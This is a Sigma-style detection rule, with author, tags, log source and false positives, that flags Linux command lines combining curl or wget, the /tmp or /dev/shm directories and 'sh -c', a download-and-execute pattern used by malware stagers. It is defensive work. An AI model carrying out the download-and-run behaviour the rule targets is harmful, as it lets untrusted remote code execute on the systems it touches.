Suspicious Download and Execute Pattern via Curl/Wget

Title: Suspicious Download and Execute Pattern via Curl/Wget
Status: experimental
Description:Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
References:
  -https://gtfobins.github.io/gtfobins/wget/
  -https://gtfobins.github.io/gtfobins/curl/
Author: Aayush Gupta
Date: 2025-06-17
modified:None
Tags:

• -'attack.execution'
• -'attack.t1059.004'
• -'attack.t1203'

Logsource:

• category: process_creation
• product: linux

Detection:
  selection_downloader:
    CommandLine|contains:
      -'/curl'
      -'/wget'

  selection_tmp:
    CommandLine|contains:
      -'/tmp/'
      -'/dev/shm/'

  selection_executor:
    CommandLine|contains: 'sh -c'
  condition:all of selection_*
Falsepositives:
  -System update scripts using temporary files
  -Installer scripts or automated provisioning tools
Level: high